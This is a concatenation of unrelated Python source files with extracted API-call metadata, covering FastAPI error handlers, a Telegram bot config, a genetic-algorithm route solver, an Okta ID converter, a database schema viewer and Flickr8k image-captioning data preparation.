False, 'import argparse, datetime, glob, json, logging, os, pprint, random, time\n'), ((5651, 5709), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (['timestamp', '"""%Y-%m-%d %H:%M:%S"""'], {}), "(timestamp, '%Y-%m-%d %H:%M:%S')\n", (5677, 5709), False, 'import argparse, datetime, glob, json, logging, os, pprint, random, time\n'), ((5844, 5873), 'pprint.pformat', 'pprint.pformat', (['self.date_dct'], {}), '(self.date_dct)\n', (5858, 5873), False, 'import argparse, datetime, glob, json, logging, os, pprint, random, time\n'), ((7496, 7519), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (7517, 7519), False, 'import argparse, datetime, glob, json, logging, os, pprint, random, time\n'), ((8641, 8664), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (8662, 8664), False, 'import argparse, datetime, glob, json, logging, os, pprint, random, time\n')]
|
from cookiecutter.main import cookiecutter
def main():
cookiecutter('source-files')#, no_input=True)
if __name__ == '__main__':
main()
|
[
"cookiecutter.main.cookiecutter"
] |
[((60, 88), 'cookiecutter.main.cookiecutter', 'cookiecutter', (['"""source-files"""'], {}), "('source-files')\n", (72, 88), False, 'from cookiecutter.main import cookiecutter\n')]
|
from typing import Union
from fastapi import HTTPException
from fastapi.exceptions import RequestValidationError
from fastapi.openapi.constants import REF_PREFIX
from fastapi.openapi.utils import validation_error_response_definition
from pydantic import ValidationError
from starlette.requests import Request
from starlette.responses import JSONResponse
from starlette.status import HTTP_422_UNPROCESSABLE_ENTITY
async def http_error_handler(_: Request, exc: HTTPException) -> JSONResponse:
return JSONResponse({"errors": [exc.detail]}, status_code=exc.status_code)
async def http422_error_handler(
_: Request,
exc: Union[RequestValidationError, ValidationError],
) -> JSONResponse:
return JSONResponse(
{"errors": exc.errors()},
status_code=HTTP_422_UNPROCESSABLE_ENTITY,
)
validation_error_response_definition["properties"] = {
"errors": {
"title": "Errors",
"type": "array",
"items": {"$ref": "{0}ValidationError".format(REF_PREFIX)},
},
}
|
[
"starlette.responses.JSONResponse"
] |
[((518, 585), 'starlette.responses.JSONResponse', 'JSONResponse', (["{'errors': [exc.detail]}"], {'status_code': 'exc.status_code'}), "({'errors': [exc.detail]}, status_code=exc.status_code)\n", (530, 585), False, 'from starlette.responses import JSONResponse\n')]
|
from nonebot import adapters
from typing import Optional
from pydantic import Field, BaseModel
class Config(BaseModel):
"""
telegram配置类
:配置项:
- ``webhook_host`` / ``telegram_webhook_host``: webhook的host
- ``bot_token`` / ``telegram_bot_token``: bot_token
- ``telegram_command_only`` / ``telegram_command_only``: 不处理非command的消息 #还无效
- ``telegram_bot_server_addr`` / ``telegram_bot_server_addr``: telegram bot api服务器地址,默认为官方
"""
webhook_addr: Optional[str] = Field(default=None, alias="telegram_webhook_host")
bot_token: Optional[str] = Field(default=None, alias="telegram_bot_token")
telegram_adapter_debug: Optional[bool] = Field(default=False, alias="telegram_adapter_debug")
telegram_command_only: Optional[bool] = Field(default=False, alias="telegram_command_only")
telegram_bot_api_server_addr: Optional[str] = Field(default="https://api.telegram.org", alias="telegram_bot_server_addr")
class Config:
extra = "ignore"
allow_population_by_field_name = True
|
[
"pydantic.Field"
] |
[((506, 556), 'pydantic.Field', 'Field', ([], {'default': 'None', 'alias': '"""telegram_webhook_host"""'}), "(default=None, alias='telegram_webhook_host')\n", (511, 556), False, 'from pydantic import Field, BaseModel\n'), ((588, 635), 'pydantic.Field', 'Field', ([], {'default': 'None', 'alias': '"""telegram_bot_token"""'}), "(default=None, alias='telegram_bot_token')\n", (593, 635), False, 'from pydantic import Field, BaseModel\n'), ((681, 733), 'pydantic.Field', 'Field', ([], {'default': '(False)', 'alias': '"""telegram_adapter_debug"""'}), "(default=False, alias='telegram_adapter_debug')\n", (686, 733), False, 'from pydantic import Field, BaseModel\n'), ((778, 829), 'pydantic.Field', 'Field', ([], {'default': '(False)', 'alias': '"""telegram_command_only"""'}), "(default=False, alias='telegram_command_only')\n", (783, 829), False, 'from pydantic import Field, BaseModel\n'), ((880, 955), 'pydantic.Field', 'Field', ([], {'default': '"""https://api.telegram.org"""', 'alias': '"""telegram_bot_server_addr"""'}), "(default='https://api.telegram.org', alias='telegram_bot_server_addr')\n", (885, 955), False, 'from pydantic import Field, BaseModel\n')]
|
import json
from core.utils.cleanOrder import cleanString
yesWords = ["oui", "d'accord", "d accord", "ok", "ça marche", "pourquoi pas", "bien sur"]
noWords = ["non", "pas du tout", "hors de question", "pas question", "impossible", "je refuse"]
def sendAnswer(answer, client):
msg = { "type": "answer", "msg": answer }
jsonMsg = json.dumps(msg)
client.send(str.encode(jsonMsg))
def sendError(answer, client):
msg = { "type": "ERROR", "msg": answer }
jsonMsg = json.dumps(msg)
client.send(str.encode(jsonMsg))
def askConfirmation(confirmMessage, originalRequest, client):
msg = {"type": "askConfirmation", "msg": confirmMessage, "originalRequest": originalRequest}
jsonMsg = json.dumps(msg)
client.send(str.encode(jsonMsg))
def isConfirmation(str):
for word in noWords:
if word in cleanString(str):
return False
for word in yesWords:
if word in cleanString(str):
return True
return False
def recvFromClient(client):
rawOrder = client.recv(1024).decode('utf-8')
#print(rawOrder)
orderJson = json.loads(rawOrder)
if(orderJson == "") :
raise ValueError("Json Vide")
return orderJson
|
[
"json.loads",
"json.dumps",
"core.utils.cleanOrder.cleanString"
] |
[((338, 353), 'json.dumps', 'json.dumps', (['msg'], {}), '(msg)\n', (348, 353), False, 'import json\n'), ((482, 497), 'json.dumps', 'json.dumps', (['msg'], {}), '(msg)\n', (492, 497), False, 'import json\n'), ((710, 725), 'json.dumps', 'json.dumps', (['msg'], {}), '(msg)\n', (720, 725), False, 'import json\n'), ((1096, 1116), 'json.loads', 'json.loads', (['rawOrder'], {}), '(rawOrder)\n', (1106, 1116), False, 'import json\n'), ((833, 849), 'core.utils.cleanOrder.cleanString', 'cleanString', (['str'], {}), '(str)\n', (844, 849), False, 'from core.utils.cleanOrder import cleanString\n'), ((921, 937), 'core.utils.cleanOrder.cleanString', 'cleanString', (['str'], {}), '(str)\n', (932, 937), False, 'from core.utils.cleanOrder import cleanString\n')]
|
"""
Feedback database model
"""
from uuid import UUID
# pylint incorrectly complains about unused import for UniqueConstraint... not sure why
from sqlalchemy.schema import ( # pylint:disable=unused-import
ForeignKey,
UniqueConstraint,
)
from pydantic import Field
from woolgatherer.db_models.base import DBBaseModel
from woolgatherer.models.feedback import FeedbackType
class Feedback(DBBaseModel, constraints=[UniqueConstraint("type", "suggestion_id")]):
"""
This is the db model for a suggestion.
"""
response: str = Field(...)
type: FeedbackType = Field(..., index=True)
suggestion_id: UUID = Field(
..., index=True, foriegn_key=ForeignKey("suggestion.uuid")
)
|
[
"sqlalchemy.schema.UniqueConstraint",
"pydantic.Field",
"sqlalchemy.schema.ForeignKey"
] |
[((549, 559), 'pydantic.Field', 'Field', (['...'], {}), '(...)\n', (554, 559), False, 'from pydantic import Field\n'), ((585, 607), 'pydantic.Field', 'Field', (['...'], {'index': '(True)'}), '(..., index=True)\n', (590, 607), False, 'from pydantic import Field\n'), ((424, 465), 'sqlalchemy.schema.UniqueConstraint', 'UniqueConstraint', (['"""type"""', '"""suggestion_id"""'], {}), "('type', 'suggestion_id')\n", (440, 465), False, 'from sqlalchemy.schema import ForeignKey, UniqueConstraint\n'), ((678, 707), 'sqlalchemy.schema.ForeignKey', 'ForeignKey', (['"""suggestion.uuid"""'], {}), "('suggestion.uuid')\n", (688, 707), False, 'from sqlalchemy.schema import ForeignKey, UniqueConstraint\n')]
|
from RouteManager import RouteManager
from Route import Route
import numpy as np
class GeneticAlgorithmSolver:
def __init__(self, cities, population_size=50, mutation_rate=0.05, tournament_size=5, elitism=True):
self.cities = cities
self.population_size = population_size
self.mutation_rate = mutation_rate
self.tournament_size = tournament_size
self.elitism = elitism
def solve(self, rm):
rm = self.evolve(rm)
for i in range(100):
rm = self.evolve(rm)
return rm
def evolve(self, routes):
'''This function provides general flow to create a new generation
from given population
Input:
routes: RouteManager object that will be evolved
Output:
child: new generation of RouteManager
'''
selected_routes = RouteManager(self.cities,self.population_size) #to store routes in selection state
#SELECTION STATE
for i in range(self.population_size-int(self.elitism)):
#replace existing routes with tournament winners
#as many as tournament_size particapants are chosen randomly
selected_routes.set_route(i, self.tournament(np.random.choice(routes.routes, self.tournament_size)))
##ELITISM PART
child_routes = RouteManager(self.cities,self.population_size) #to store new child routes
if self.elitism: #if elitism then best route will directly pass to next generation
temporary_route = Route(self.cities)
elite_route = routes.find_best_route()
for i in range(len(elite_route)):
temporary_route.assign_city(i,elite_route.get_city(i))
child_routes.set_route(self.population_size-1, temporary_route)
#CROSS-OVER STATE
for i in range(self.population_size-int(self.elitism)):
#replace existing child routes with actually generated ones
#first route is matched with last, second is matched with second from last and so on.
child_routes.set_route(i, self.crossover(selected_routes.get_route(i),selected_routes.get_route(self.population_size-1-i)))
#MUTATION STATE
for i in range(len(child_routes)-int(self.elitism)):
#send each routes to mutation function
self.mutate(child_routes.get_route(i))
return child_routes
def crossover(self, route_1, route_2):
'''This function creates a crossed-over child route from
two given parent routes.
Input:
route_1: first parent route
route_2: second parent route
Output:
child: generated child route
'''
#determining random start and end genes
#which will stay same as in the first parent
a = np.random.rand()
b = np.random.rand()
low_point=int(min(a,b)*len(self.cities))
up_point=int(max(a,b)*len(self.cities))
child=route_1 #child creation
gen_list=[] #this list stores the cities as in the generated child's order
for i in range(low_point,up_point):
#from randomly generated low to up point cities will stay same
gen_list.append(route_1.get_city(i))
#subset contains cities that hasnot been added to gen list and as in the second parent's order
subset=[item for item in route_2.route if item not in gen_list]
#add the cities in the subset
for i in range(len(self.cities)):
if i not in range(low_point,up_point):
indx=i if i<low_point else i-(up_point-low_point)
child.assign_city(i,subset[indx])
return child
def mutate(self, route):
'''This function randomly deformate the genes with
a given probabiliy
Input:
route: RouteManager object that would mutate
Output:
None
'''
for i in range(len(route)): #each gene can be subject to mutation
if np.random.rand()<self.mutation_rate: #mutation occurs with the probality of mutation_rate
#if probabability occurs given gene is replaced with another random gene
swap_indx=int(len(route)*np.random.rand())
city1 = route.get_city(i)
city2 = route.get_city(swap_indx)
route.assign_city(i,city2)
route.assign_city(swap_indx, city1)
return
def tournament(self, routes):
'''This function returns the route with best fitness score
among a set of routes.
Input:
routes: list of routes
Output:
return_route: route that gives best fitness
'''
best_fitness=0 #first set
for r in routes:
if r.calc_fitness()>best_fitness: #update if better route exist than current best.
best_fitness=r.calc_fitness()
tour_winner=r
return_route = Route(self.cities) #creating the return value
for i in range(len(return_route)):
return_route.assign_city(i,tour_winner.get_city(i))
return return_route
|
[
"numpy.random.rand",
"Route.Route",
"RouteManager.RouteManager",
"numpy.random.choice"
] |
[((866, 913), 'RouteManager.RouteManager', 'RouteManager', (['self.cities', 'self.population_size'], {}), '(self.cities, self.population_size)\n', (878, 913), False, 'from RouteManager import RouteManager\n'), ((1350, 1397), 'RouteManager.RouteManager', 'RouteManager', (['self.cities', 'self.population_size'], {}), '(self.cities, self.population_size)\n', (1362, 1397), False, 'from RouteManager import RouteManager\n'), ((2851, 2867), 'numpy.random.rand', 'np.random.rand', ([], {}), '()\n', (2865, 2867), True, 'import numpy as np\n'), ((2880, 2896), 'numpy.random.rand', 'np.random.rand', ([], {}), '()\n', (2894, 2896), True, 'import numpy as np\n'), ((5063, 5081), 'Route.Route', 'Route', (['self.cities'], {}), '(self.cities)\n', (5068, 5081), False, 'from Route import Route\n'), ((1545, 1563), 'Route.Route', 'Route', (['self.cities'], {}), '(self.cities)\n', (1550, 1563), False, 'from Route import Route\n'), ((4085, 4101), 'numpy.random.rand', 'np.random.rand', ([], {}), '()\n', (4099, 4101), True, 'import numpy as np\n'), ((1238, 1291), 'numpy.random.choice', 'np.random.choice', (['routes.routes', 'self.tournament_size'], {}), '(routes.routes, self.tournament_size)\n', (1254, 1291), True, 'import numpy as np\n'), ((4305, 4321), 'numpy.random.rand', 'np.random.rand', ([], {}), '()\n', (4319, 4321), True, 'import numpy as np\n')]
|
import json
import pytest
from flask import Response
from flask.testing import FlaskClient
class APIResponse(Response):
def json(self):
return json.loads(self.data)
@pytest.fixture()
def test_client(core_app):
core_app.test_client_class = FlaskClient
core_app.response_class = APIResponse
return core_app.test_client()
|
[
"pytest.fixture",
"json.loads"
] |
[((183, 199), 'pytest.fixture', 'pytest.fixture', ([], {}), '()\n', (197, 199), False, 'import pytest\n'), ((158, 179), 'json.loads', 'json.loads', (['self.data'], {}), '(self.data)\n', (168, 179), False, 'import json\n')]
|
"""
--- okta-user-id --
This is a simple module for turning (apparently) base62-encoded Okta user IDs
into UUIDs. It also allows for reversing the UUID to an Okta user ID.
"""
__title__ = 'okta-uuid'
__author__ = '<NAME>'
__email__ = '<EMAIL>'
__version__ = '0.1.0'
import uuid
import base62
class OktaUserId(object):
def __init__(self, uid):
self.__uid = uid
d = base62.decode(uid)
b = d.to_bytes(16, byteorder='little')
self.__uuid = u = uuid.UUID(bytes_le=b)
@property
def uid(self):
return self.__uid
@property
def uuid(self):
return self.__uuid
def __eq__(self, other):
return self.uid == other.uid
def __str__(self):
return self.uid
def __repr__(self):
return "OktaUserId('{}')".format(self.uid)
@classmethod
def from_uuid(cls, u, length=20):
"""
Derive an Okta UID from the given UUID, padding the left of the string
ID with zeroes.
"""
b = int.from_bytes(u.bytes_le, byteorder='little')
d = base62.encode(b)
padded = d.zfill(length)
return cls(padded)
|
[
"base62.encode",
"base62.decode",
"uuid.UUID"
] |
[((391, 409), 'base62.decode', 'base62.decode', (['uid'], {}), '(uid)\n', (404, 409), False, 'import base62\n'), ((483, 504), 'uuid.UUID', 'uuid.UUID', ([], {'bytes_le': 'b'}), '(bytes_le=b)\n', (492, 504), False, 'import uuid\n'), ((1072, 1088), 'base62.encode', 'base62.encode', (['b'], {}), '(b)\n', (1085, 1088), False, 'import base62\n')]
|
import dearpygui.dearpygui as dpg
from .window import Window
from . import ConnectionListWindow
class SchemaWindow(Window):
def __init__(self, app, **kwargs):
# fmt: off
super().__init__(
app, 'Текущее подключение', 'main_window', (800, 500),
tag_schema_selector='schema selector', tag_listbox='table list', tag_content='current table',
tag_schema='current schema', tag_handler='table list handler', tag_limit='select_limit',
table_params={
'header_row': True, 'borders_outerH': True, 'borders_innerV': True, 'borders_innerH': True,
'borders_outerV': True, 'resizable': True, 'no_host_extendX': True
}, **kwargs
)
# fmt: on
def construct(self) -> None:
with dpg.group(horizontal=True):
with dpg.group(width=200):
dpg.add_text('Schemas')
dpg.add_combo((), tag=self.tag_schema_selector, callback=self.ui_select_schema)
dpg.add_text('Tables')
dpg.add_listbox((), tag=self.tag_listbox, callback=self.ui_select_table)
with dpg.group():
dpg.add_text('Limit')
dpg.add_input_text(tag='select_limit', default_value='10')
dpg.add_spacer(height=20)
dpg.add_button(label='Отключиться', callback=self.ui_disconnect)
with dpg.tab_bar(label='tabs'):
with dpg.tab(label='content'):
dpg.add_table(tag=self.tag_content, **self.table_params)
with dpg.tab(label='schema'):
dpg.add_table(tag=self.tag_schema, **self.table_params)
def show(self) -> None:
super().show()
dpg.configure_item(self.tag_schema_selector, items=self.app.inspector.get_schema_names())
def ui_disconnect(self) -> None:
ConnectionListWindow().show()
self.app.engine = None
self.app.inspector = None
dpg.delete_item(self.window_id)
self.initiated = False
def ui_select_table(self, sender, table=None):
"""Select table from schema and initiate tab panel"""
dpg.delete_item(self.tag_content, children_only=True)
dpg.delete_item(self.tag_schema, children_only=True)
schema = dpg.get_value(self.tag_schema_selector)
table = table or dpg.get_value(self.tag_listbox)
limit = dpg.get_value(self.tag_limit)
if not table:
return
columns = self.app.inspector.get_columns(table, schema=schema)
for c in columns:
dpg.add_table_column(label=c['name'], parent=self.tag_content)
for column in ['param', 'type', 'nullable', 'default', 'foreign key']:
dpg.add_table_column(label=column, parent=self.tag_schema)
with self.app.engine.connect() as conn:
for row in conn.execute(f'select * from {table} limit {limit}'):
with dpg.table_row(parent=self.tag_content):
for e in row:
dpg.add_text(e)
foreign_keys = {
i['constrained_columns'][0]: '{referred_schema}.{referred_table}({referred_columns[0]})'.format(**i)
for i in self.app.inspector.get_foreign_keys(table, schema=schema)
}
for item in columns:
with dpg.table_row(parent=self.tag_schema):
dpg.add_text(item['name'])
dpg.add_text(item['type'])
dpg.add_text(item['nullable'])
dpg.add_text(item['default'])
dpg.add_text(foreign_keys.get(item['name']))
def ui_select_schema(self, sender, schema):
"""Select schema from schemas list."""
dpg.configure_item(self.tag_listbox, items=sorted(self.app.inspector.get_table_names(schema=schema)))
self.ui_select_table(sender) # because listbox has selected item, but doesnt trigger callback itself
|
[
"dearpygui.dearpygui.add_input_text",
"dearpygui.dearpygui.add_text",
"dearpygui.dearpygui.add_button",
"dearpygui.dearpygui.group",
"dearpygui.dearpygui.get_value",
"dearpygui.dearpygui.delete_item",
"dearpygui.dearpygui.add_combo",
"dearpygui.dearpygui.add_spacer",
"dearpygui.dearpygui.tab",
"dearpygui.dearpygui.table_row",
"dearpygui.dearpygui.add_table",
"dearpygui.dearpygui.add_listbox",
"dearpygui.dearpygui.tab_bar",
"dearpygui.dearpygui.add_table_column"
] |
[((2008, 2039), 'dearpygui.dearpygui.delete_item', 'dpg.delete_item', (['self.window_id'], {}), '(self.window_id)\n', (2023, 2039), True, 'import dearpygui.dearpygui as dpg\n'), ((2194, 2247), 'dearpygui.dearpygui.delete_item', 'dpg.delete_item', (['self.tag_content'], {'children_only': '(True)'}), '(self.tag_content, children_only=True)\n', (2209, 2247), True, 'import dearpygui.dearpygui as dpg\n'), ((2256, 2308), 'dearpygui.dearpygui.delete_item', 'dpg.delete_item', (['self.tag_schema'], {'children_only': '(True)'}), '(self.tag_schema, children_only=True)\n', (2271, 2308), True, 'import dearpygui.dearpygui as dpg\n'), ((2327, 2366), 'dearpygui.dearpygui.get_value', 'dpg.get_value', (['self.tag_schema_selector'], {}), '(self.tag_schema_selector)\n', (2340, 2366), True, 'import dearpygui.dearpygui as dpg\n'), ((2440, 2469), 'dearpygui.dearpygui.get_value', 'dpg.get_value', (['self.tag_limit'], {}), '(self.tag_limit)\n', (2453, 2469), True, 'import dearpygui.dearpygui as dpg\n'), ((802, 828), 'dearpygui.dearpygui.group', 'dpg.group', ([], {'horizontal': '(True)'}), '(horizontal=True)\n', (811, 828), True, 'import dearpygui.dearpygui as dpg\n'), ((2392, 2423), 'dearpygui.dearpygui.get_value', 'dpg.get_value', (['self.tag_listbox'], {}), '(self.tag_listbox)\n', (2405, 2423), True, 'import dearpygui.dearpygui as dpg\n'), ((2622, 2684), 'dearpygui.dearpygui.add_table_column', 'dpg.add_table_column', ([], {'label': "c['name']", 'parent': 'self.tag_content'}), "(label=c['name'], parent=self.tag_content)\n", (2642, 2684), True, 'import dearpygui.dearpygui as dpg\n'), ((2776, 2834), 'dearpygui.dearpygui.add_table_column', 'dpg.add_table_column', ([], {'label': 'column', 'parent': 'self.tag_schema'}), '(label=column, parent=self.tag_schema)\n', (2796, 2834), True, 'import dearpygui.dearpygui as dpg\n'), ((847, 867), 'dearpygui.dearpygui.group', 'dpg.group', ([], {'width': '(200)'}), '(width=200)\n', (856, 867), True, 'import dearpygui.dearpygui as dpg\n'), ((885, 908), 'dearpygui.dearpygui.add_text', 'dpg.add_text', (['"""Schemas"""'], {}), "('Schemas')\n", (897, 908), True, 'import dearpygui.dearpygui as dpg\n'), ((925, 1004), 'dearpygui.dearpygui.add_combo', 'dpg.add_combo', (['()'], {'tag': 'self.tag_schema_selector', 'callback': 'self.ui_select_schema'}), '((), tag=self.tag_schema_selector, callback=self.ui_select_schema)\n', (938, 1004), True, 'import dearpygui.dearpygui as dpg\n'), ((1021, 1043), 'dearpygui.dearpygui.add_text', 'dpg.add_text', (['"""Tables"""'], {}), "('Tables')\n", (1033, 1043), True, 'import dearpygui.dearpygui as dpg\n'), ((1060, 1132), 'dearpygui.dearpygui.add_listbox', 'dpg.add_listbox', (['()'], {'tag': 'self.tag_listbox', 'callback': 'self.ui_select_table'}), '((), tag=self.tag_listbox, callback=self.ui_select_table)\n', (1075, 1132), True, 'import dearpygui.dearpygui as dpg\n'), ((1436, 1461), 'dearpygui.dearpygui.tab_bar', 'dpg.tab_bar', ([], {'label': '"""tabs"""'}), "(label='tabs')\n", (1447, 1461), True, 'import dearpygui.dearpygui as dpg\n'), ((1154, 1165), 'dearpygui.dearpygui.group', 'dpg.group', ([], {}), '()\n', (1163, 1165), True, 'import dearpygui.dearpygui as dpg\n'), ((1187, 1208), 'dearpygui.dearpygui.add_text', 'dpg.add_text', (['"""Limit"""'], {}), "('Limit')\n", (1199, 1208), True, 'import dearpygui.dearpygui as dpg\n'), ((1229, 1287), 'dearpygui.dearpygui.add_input_text', 'dpg.add_input_text', ([], {'tag': '"""select_limit"""', 'default_value': '"""10"""'}), "(tag='select_limit', default_value='10')\n", (1247, 1287), True, 'import dearpygui.dearpygui as dpg\n'), ((1308, 1333), 'dearpygui.dearpygui.add_spacer', 'dpg.add_spacer', ([], {'height': '(20)'}), '(height=20)\n', (1322, 1333), True, 'import dearpygui.dearpygui as dpg\n'), ((1354, 1418), 'dearpygui.dearpygui.add_button', 'dpg.add_button', ([], {'label': '"""Отключиться"""', 'callback': 'self.ui_disconnect'}), "(label='Отключиться', callback=self.ui_disconnect)\n", (1368, 1418), True, 'import dearpygui.dearpygui as dpg\n'), ((1484, 1508), 'dearpygui.dearpygui.tab', 'dpg.tab', ([], {'label': '"""content"""'}), "(label='content')\n", (1491, 1508), True, 'import dearpygui.dearpygui as dpg\n'), ((1530, 1586), 'dearpygui.dearpygui.add_table', 'dpg.add_table', ([], {'tag': 'self.tag_content'}), '(tag=self.tag_content, **self.table_params)\n', (1543, 1586), True, 'import dearpygui.dearpygui as dpg\n'), ((1608, 1631), 'dearpygui.dearpygui.tab', 'dpg.tab', ([], {'label': '"""schema"""'}), "(label='schema')\n", (1615, 1631), True, 'import dearpygui.dearpygui as dpg\n'), ((1653, 1708), 'dearpygui.dearpygui.add_table', 'dpg.add_table', ([], {'tag': 'self.tag_schema'}), '(tag=self.tag_schema, **self.table_params)\n', (1666, 1708), True, 'import dearpygui.dearpygui as dpg\n'), ((2982, 3020), 'dearpygui.dearpygui.table_row', 'dpg.table_row', ([], {'parent': 'self.tag_content'}), '(parent=self.tag_content)\n', (2995, 3020), True, 'import dearpygui.dearpygui as dpg\n'), ((3394, 3431), 'dearpygui.dearpygui.table_row', 'dpg.table_row', ([], {'parent': 'self.tag_schema'}), '(parent=self.tag_schema)\n', (3407, 3431), True, 'import dearpygui.dearpygui as dpg\n'), ((3453, 3479), 'dearpygui.dearpygui.add_text', 'dpg.add_text', (["item['name']"], {}), "(item['name'])\n", (3465, 3479), True, 'import dearpygui.dearpygui as dpg\n'), ((3500, 3526), 'dearpygui.dearpygui.add_text', 'dpg.add_text', (["item['type']"], {}), "(item['type'])\n", (3512, 3526), True, 'import dearpygui.dearpygui as dpg\n'), ((3547, 3577), 'dearpygui.dearpygui.add_text', 'dpg.add_text', (["item['nullable']"], {}), "(item['nullable'])\n", (3559, 3577), True, 'import dearpygui.dearpygui as dpg\n'), ((3598, 3627), 'dearpygui.dearpygui.add_text', 'dpg.add_text', (["item['default']"], {}), "(item['default'])\n", (3610, 3627), True, 'import dearpygui.dearpygui as dpg\n'), ((3080, 3095), 'dearpygui.dearpygui.add_text', 'dpg.add_text', (['e'], {}), '(e)\n', (3092, 3095), True, 'import dearpygui.dearpygui as dpg\n')]
|
#!/usr/bin/env python3
####################################################################################
# Script is not in use, since this is no longer in the main corpus
# Cleaning up parliament speech files
# Output is an UTF-8 file with one article per line
####################################################################################
import sys, glob, os, re, argparse
import pandas as pd
def main(args):
minimum_number_of_words_in_an_article = 1
all_articles = ""
valid_article_count = 0
#Read the file
df = pd.read_csv(args.input_file, encoding='utf-8', dtype='string')
for index, row in df.iterrows():
article = row['text']
if len(str(article).split()) >= minimum_number_of_words_in_an_article:
valid_article_count += 1
all_articles += str(article) + '\n'
#Uncomment to run a test on part of the dataset
#if index > 100:
# break
with open(args.output_file, 'w+', encoding="utf-8") as f:
f.write(all_articles)
#Print some statistics
word_count = len(re.findall(r'\w+', all_articles))
print(f'Saved file: {args.output_file}')
print(f'Total number of articles: {index}')
print(f'Number of valid articles: {valid_article_count}')
print(f'Number of words: {word_count}')
def parse_args():
# Parse commandline
parser = argparse.ArgumentParser(
description="Create corpus from parliament files! Output is an UTF-8 JSON lines")
parser.add_argument('--input_file', required=True, type=str, help='Input file')
parser.add_argument('--output_file', required=True, type=str, help='Output file')
args = parser.parse_args()
return args
if __name__ == "__main__":
args = parse_args()
main(args)
|
[
"pandas.read_csv",
"re.findall",
"argparse.ArgumentParser"
] |
[((549, 611), 'pandas.read_csv', 'pd.read_csv', (['args.input_file'], {'encoding': '"""utf-8"""', 'dtype': '"""string"""'}), "(args.input_file, encoding='utf-8', dtype='string')\n", (560, 611), True, 'import pandas as pd\n'), ((1382, 1492), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Create corpus from parliament files! Output is an UTF-8 JSON lines"""'}), "(description=\n 'Create corpus from parliament files! Output is an UTF-8 JSON lines')\n", (1405, 1492), False, 'import sys, glob, os, re, argparse\n'), ((1092, 1124), 're.findall', 're.findall', (['"""\\\\w+"""', 'all_articles'], {}), "('\\\\w+', all_articles)\n", (1102, 1124), False, 'import sys, glob, os, re, argparse\n')]
|
# Generated by Django 3.2.7 on 2021-09-20 13:31
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('my_ip', '0004_alter_rating_table'),
]
operations = [
migrations.RenameField(
model_name='project',
old_name='image',
new_name='project_image',
),
]
|
[
"django.db.migrations.RenameField"
] |
[((225, 318), 'django.db.migrations.RenameField', 'migrations.RenameField', ([], {'model_name': '"""project"""', 'old_name': '"""image"""', 'new_name': '"""project_image"""'}), "(model_name='project', old_name='image', new_name=\n 'project_image')\n", (247, 318), False, 'from django.db import migrations\n')]
|
from aoc2019.helpers.day04 import countValidPasswordsInRange, consecutiveDigitsRegex, exactlyTwoConsecutiveDigitsRegex
from aoc2019.shared.solution import Solution
class Day4(Solution):
def part1(self):
return countValidPasswordsInRange(
152085, 670283, consecutiveDigitsRegex)
def part2(self):
return countValidPasswordsInRange(
152085, 670283, exactlyTwoConsecutiveDigitsRegex)
|
[
"aoc2019.helpers.day04.countValidPasswordsInRange"
] |
[((224, 290), 'aoc2019.helpers.day04.countValidPasswordsInRange', 'countValidPasswordsInRange', (['(152085)', '(670283)', 'consecutiveDigitsRegex'], {}), '(152085, 670283, consecutiveDigitsRegex)\n', (250, 290), False, 'from aoc2019.helpers.day04 import countValidPasswordsInRange, consecutiveDigitsRegex, exactlyTwoConsecutiveDigitsRegex\n'), ((341, 417), 'aoc2019.helpers.day04.countValidPasswordsInRange', 'countValidPasswordsInRange', (['(152085)', '(670283)', 'exactlyTwoConsecutiveDigitsRegex'], {}), '(152085, 670283, exactlyTwoConsecutiveDigitsRegex)\n', (367, 417), False, 'from aoc2019.helpers.day04 import countValidPasswordsInRange, consecutiveDigitsRegex, exactlyTwoConsecutiveDigitsRegex\n')]
|
# Load libraries
import matplotlib.pyplot as plt
import pandas as pd
import pickle
import numpy as np
import os
from keras.applications.resnet50 import ResNet50
from keras.optimizers import Adam
from keras.layers import Dense, Flatten,Input, Convolution2D, Dropout, LSTM, TimeDistributed, Embedding, Bidirectional, Activation, RepeatVector,Concatenate
from keras.models import Sequential, Model
from keras.utils import np_utils
import random
from keras.preprocessing import image, sequence
import matplotlib.pyplot as plt
# Load data
images_dir = os.listdir("D:\\FBAi\\data\\Flickr_Data")
images_path = 'D:\\FBAi\\data\\Flickr_Data\\Images\\'
captions_path = 'D:\\FBAi\data\Flickr_Data\\Flickr_TextData\\Flickr8k.token.txt'
train_path = 'D:\\FBAi\\data\\Flickr_Data\\Flickr_TextData\\Flickr_8k.trainImages.txt'
val_path = 'D:\\FBAi\\data\\Flickr_Data\\Flickr_TextData\\Flickr_8k.devImages.txt'
test_path = 'D:\\FBAi\\data\\Flickr_Data\\Flickr_TextData\\Flickr_8k.testImages.txt'
captions = open(captions_path, 'r').read().split("\n")
x_train = open(train_path, 'r').read().split("\n")
x_val = open(val_path, 'r').read().split("\n")
x_test = open(test_path, 'r').read().split("\n")
# Loading captions as values and images as key in dictionary
tokens = {}
for ix in range(len(captions)-1):
temp = captions[ix].split("#")
if temp[0] in tokens:
tokens[temp[0]].append(temp[1][2:])
else:
tokens[temp[0]] = [temp[1][2:]]
# displaying an image and captions given to it
temp = captions[10].split("#")
from IPython.display import Image, display
z = Image(filename=images_path+temp[0])
display(z)
for ix in range(len(tokens[temp[0]])):
print(tokens[temp[0]][ix])
# Creating train, test and validation dataset files with header as 'image_id' and 'captions'
train_dataset = open('flickr_8k_train_dataset.txt','wb')
train_dataset.write(b"image_id\tcaptions\n")
val_dataset = open('flickr_8k_val_dataset.txt','wb')
val_dataset.write(b"image_id\tcaptions\n")
test_dataset = open('flickr_8k_test_dataset.txt','wb')
test_dataset.write(b"image_id\tcaptions\n")
# Populating the above created files for train, test and validation dataset with image ids and captions for each of these images
for img in x_train:
if img == '':
continue
for capt in tokens[img]:
caption = "<start> "+ capt + " <end>"
train_dataset.write((img+"\t"+caption+"\n").encode())
train_dataset.flush()
train_dataset.close()
for img in x_test:
if img == '':
continue
for capt in tokens[img]:
caption = "<start> "+ capt + " <end>"
test_dataset.write((img+"\t"+caption+"\n").encode())
test_dataset.flush()
test_dataset.close()
for img in x_val:
if img == '':
continue
for capt in tokens[img]:
caption = "<start> "+ capt + " <end>"
val_dataset.write((img+"\t"+caption+"\n").encode())
val_dataset.flush()
val_dataset.close()
# Loading 50 layer Residual Network Model and getting the summary of the model
from IPython.core.display import display, HTML
